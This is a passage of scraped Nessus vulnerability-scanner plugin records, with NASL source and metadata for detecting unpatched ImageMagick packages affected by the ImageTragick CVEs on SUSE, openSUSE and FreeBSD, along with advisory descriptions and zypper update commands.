Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161260-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fa76cf4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-733=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-733=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-733=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-733=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-733=1\n\nTo 
bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagick++-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/05/09\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-19.1\")) 
flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"ImageMagick-debugsource-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-19.1\")) 
flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:59", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks; these coders have now been disabled by default but can be re-enabled by editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient filtering of shell characters leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol, which deletes files after reading.\n\n - CVE-2016-3716: Possible file move, with any extension and into any folder, by using ImageMagick's 'msl' pseudo protocol.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get the content of files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make an HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ImageMagick", 
"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-6_q16-3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libmagick%2b%2b-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-574.NASL", "href": "https://www.tenable.com/plugins/nessus/90986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-574.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90986);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-574) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-574 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled by default\n but can be re-enabled by editing\n '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debugsource-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:51", "description": "Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command allows remote 
code execution during conversion of several file formats. Any service which uses ImageMagick to process user-supplied images and uses the default delegates.xml / policy.xml may be vulnerable to this issue.\n\nIt is possible to make ImageMagick perform an HTTP GET or FTP request.\n\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo protocol, which deletes files after reading.\n\nIt is possible to move image files to a file with any extension in any folder by using ImageMagick's 'msl' pseudo protocol. msl.txt and image.gif should exist in a known location - /tmp/ for the PoC (in real life it may be a web service written in PHP that allows uploading raw txt files and processes images with ImageMagick).\n\nIt is possible to get the content of files from the server by using ImageMagick's 'label' pseudo protocol.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ImageMagick", "p-cpe:/a:freebsd:freebsd:ImageMagick-nox11", "p-cpe:/a:freebsd:freebsd:ImageMagick7", "p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "href": "https://www.tenable.com/plugins/nessus/90979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted 
provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90979);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"FreeBSD : ImageMagick -- 